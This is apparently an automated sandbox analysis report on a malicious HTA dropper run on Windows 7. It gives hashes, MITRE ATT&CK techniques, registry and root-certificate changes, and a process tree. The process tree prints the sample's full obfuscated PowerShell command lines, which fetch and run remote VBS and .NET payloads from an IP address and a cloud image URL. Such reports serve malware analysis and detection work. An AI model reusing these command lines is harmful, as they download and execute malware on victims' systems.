62db7e02b51b89f767c5740bb8569668ddcf134b2865959d9fc7a749209d0539

Analysis

max time kernel
39s
max time network
41s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
12-12-2024 02:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

62db7e02b51b89f767c5740bb8569668ddcf134b2865959d9fc7a749209d0539.hta
Size

81KB
MD5

76277ab4bde108fed474724b88ad0e39
SHA1

f73ba378275e5bc2492e53b63c96c22f35599ffc
SHA256

62db7e02b51b89f767c5740bb8569668ddcf134b2865959d9fc7a749209d0539
SHA512

7a914101c566fcf41b596ceafdde08674a979c9c20731d2e9a1dd0d58cf360204bca82b4680faa684806a5e7e4e88f285cb63bf414fd613878f7281cf60fc5a1
SSDEEP

768:tmbUZA+cT/RVeU2Dx6AyZ6LAuAHAbvOx7ze2pe2Ju2x4/mlpu6ae28RWHTuQBwxW:tD

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

exe.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
3	2680	powershell.exe
7	2944	WScript.exe
9	2944	WScript.exe
11	624	powershell.exe
13	624	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
3008	cmd.exe
2680	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
624	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	WScript.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2680	powershell.exe
624	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	624	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1936 wrote to memory of 3008	1936	mshta.exe	29
PID 1936 wrote to memory of 3008	1936	mshta.exe	29
PID 1936 wrote to memory of 3008	1936	mshta.exe	29
PID 1936 wrote to memory of 3008	1936	mshta.exe	29
PID 3008 wrote to memory of 2680	3008	cmd.exe	31
PID 3008 wrote to memory of 2680	3008	cmd.exe	31
PID 3008 wrote to memory of 2680	3008	cmd.exe	31
PID 3008 wrote to memory of 2680	3008	cmd.exe	31
PID 2680 wrote to memory of 2684	2680	powershell.exe	32
PID 2680 wrote to memory of 2684	2680	powershell.exe	32
PID 2680 wrote to memory of 2684	2680	powershell.exe	32
PID 2680 wrote to memory of 2684	2680	powershell.exe	32
PID 2684 wrote to memory of 2860	2684	csc.exe	33
PID 2684 wrote to memory of 2860	2684	csc.exe	33
PID 2684 wrote to memory of 2860	2684	csc.exe	33
PID 2684 wrote to memory of 2860	2684	csc.exe	33
PID 2680 wrote to memory of 2944	2680	powershell.exe	35
PID 2680 wrote to memory of 2944	2680	powershell.exe	35
PID 2680 wrote to memory of 2944	2680	powershell.exe	35
PID 2680 wrote to memory of 2944	2680	powershell.exe	35
PID 2944 wrote to memory of 624	2944	WScript.exe	36
PID 2944 wrote to memory of 624	2944	WScript.exe	36
PID 2944 wrote to memory of 624	2944	WScript.exe	36
PID 2944 wrote to memory of 624	2944	WScript.exe	36

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\62db7e02b51b89f767c5740bb8569668ddcf134b2865959d9fc7a749209d0539.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1936
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3008
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2680
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\veshqts2.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2684
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES736C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC736B.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2860
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS"
      4⤵
      Blocklisted process makes network request
      System Location Discovery: System Language Discovery
      Modifies system certificate store
      Suspicious use of WriteProcessMemory
      PID:2944
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e0637975fad5263557b5c841020e36be

SHA1
2bf14f1533edcd5e2c29953671ed3b5e01d89e03

SHA256
c41c1e94e2b2c0087d7c2c776995ee0cc60605330fe86ef26c3fa68593719367

SHA512
b74e0fbb7293b469b11cc9baea1be55ea9f9bef23e99f31acc290de8ce9657d9427a270871d5e2498ca59ba86e7e26d1cb20db4b34b2748f0618a34e7dc8421e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab8787.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES736C.tmp

Filesize
1KB

MD5
130ff2e7c66f906e5386f499e4ee74b2

SHA1
f44885a9d2c1339d39b58448d43de676ebefbc48

SHA256
5d26c4097f743a0177d86f7cf0c252574c1c2dd7087ca9ff4133506ff87e306a

SHA512
3b59bf5326a7127186bb08200b0d7419451dc29b23d79585f59a659ba5bbf8d4b53698c925dc2f6d2e6758797636ef5145fae4d02bc3fa29478a9965f54ade21

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar8817.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\veshqts2.dll

Filesize
3KB

MD5
ec0fbfe03ee8b2a03b152d147f4abe6f

SHA1
cc91df23c3dd2e8937cd76003ff49759b2360f94

SHA256
45fbbb462448b3b8b17b86f78a07b1b7884650fbf4468cdb085d4b3931907512

SHA512
6e6ef63f361952b8fb36b447e113aa593ac8ab0dbab6d81737ca8a6f7687f6d3b685473b06e7a3d8aaa5d8451505bc7006ae6f857ba0a9436645c65df756c22b

Download Submit
C:\Users\Admin\AppData\Local\Temp\veshqts2.pdb

Filesize
7KB

MD5
df39bda209816738eba5b4d6f393a293

SHA1
e6f71dc87abd9bd2c4a2eda1cdb8a33bf3f62dc4

SHA256
2ec25bcd518ebb23beecf9e418fa34e0f4ffade00b6f1f756b28b83715a2d432

SHA512
09913bce88716bb1d59dcae97454f0860438a73bf85c56885b89f37b9c18a28b5e88610a1d6e042977bb3591794e87460e254a78c51f6fc8547132be52728ad3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
316d1523fd784aabc3cfd1a0a7443f80

SHA1
e263484e72a33babef61b3569465597540fed47e

SHA256
4eabcd8348f0158b0f79cbefa18be07ffa6d6f6b43e167f6451789f43152bf21

SHA512
c47dfcd3f7df9be4463dc6a6eda4c8fa806e3268508c67048503f4ba104ee32d270924c9deb5438f33e320114a6c7a4ea7a7ff74c40149cde52f448fb25ccbb7

Download Submit
C:\Users\Admin\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS

Filesize
1KB

MD5
a9de1dd61052fb7164600306135b0771

SHA1
4efefaf03b42637e74817b4695fc086b2d95191e

SHA256
bfbe88f62a33e1cd2289a9179dfe2151c9427c0ccd13753a029c3dcb78852fae

SHA512
9ce749ff8b7bb054b827534afbd900a44e6aa03e8818d4cf9121cc9e8448ebc0a21ce641e6db4d0824c14806cd34f8fee301a523c338526cb9c5757e1547f6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC736B.tmp

Filesize
652B

MD5
4efc707ffc37f89e81de4f6d6a588015

SHA1
c0c169fa60db6b59fa184a222ddc35ef0eb5f4c5

SHA256
7c6ca98acc728de4e6a50a457049762154d607da808f75789a35a178d56a60d4

SHA512
c65b2cb549fb79aa5412c27bf0b0434930bf1dd96a54202c4a4c0419440e9c3d1c5be229169bcb704d0689386b289e90bb4dcce56f026278bb5db918ed388e75

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\veshqts2.0.cs

Filesize
496B

MD5
ee707a34980a4df56a07be04f7825b38

SHA1
65ce7b9161c445f33f2f28dc13c92872c209e83a

SHA256
fe3dc6c711ddb4c32c5ff8b18b557804d3180005bfa99a8dc02b945d70ea5cbc

SHA512
1fb569ac9eaca82c89cb3ed59bffe339fe579a62668ed4899d234ab64a4b08ead39c088db17d3745eb16b7f3428b6ed7eb664ed13f90b21d00759158a40f9cd5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\veshqts2.cmdline

Filesize
309B

MD5
c25d994392554093f55d8befb97febdd

SHA1
9e6c6864b9a0bde180a9dd508741d754b552bfe1

SHA256
de6331c045f6bb419e24b621ef530a4e75ab878a53b372519fc6050d0bb8672d

SHA512
f641e4c99ed24883d61594b5834a9bfccc0701d2be86928e4a6eb262a9c3793161d4f4627b500fde0e1fea2783c31d0a324d196cee76564826f7c63ac0744e02

Download Submit